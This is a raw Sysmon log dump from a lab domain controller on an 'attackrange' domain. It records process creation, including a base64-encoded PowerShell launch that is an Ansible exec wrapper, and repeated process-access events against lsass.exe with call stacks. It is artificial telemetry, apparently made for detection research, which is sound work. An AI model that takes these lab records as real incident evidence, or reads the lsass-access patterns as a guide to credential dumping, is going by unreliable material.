13:54:46.413{10ACEC4A-85A6-5FCF-F400-000000009101}4552C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-85A6-5FCF-374B-090000000000}0x94b370HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{10ACEC4A-85A6-5FCF-F300-000000009101}4636C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x80000000000000005916Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.391{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005915Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.391{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005914Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.391{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005913Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.344{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-85A6-5FCF-F300-000000009101}4636C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005912Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.344{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-85A6-5FCF-F300-000000009101}4636C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005911Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.313{10ACEC4A-85A6-5FCF-F300-000000009101}4636C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_g2rmlwut.yv1.ps12020-12-08 13:54:46.313 10341000x80000000000000005910Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.297{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-85A6-5FCF-F300-000000009101}4636C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005909Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F300-000000009101}4636C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005908Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F300-000000009101}4636C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005907Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F200-000000009101}748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005906Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F200-000000009101}748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005905Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F100-000000009101}4156C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005904Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F100-000000009101}4156C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005903Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F000-000000009101}4836C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005902Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F000-000000009101}4836C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005901Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-EF00-000000009101}4148C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005900Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-EF00-000000009101}4148C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005899Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A5-5FCF-EE00-000000009101}2796C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005898Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A5-5FCF-EE00-000000009101}2796C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005897Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A4-5FCF-ED00-000000009101}2772C:\Windows\system32\wbem\WmiApSrv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005896Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A4-5FCF-ED00-000000009101}2772C:\Windows\system32\wbem\WmiApSrv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005895Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8600-000000009101}4628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005894Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 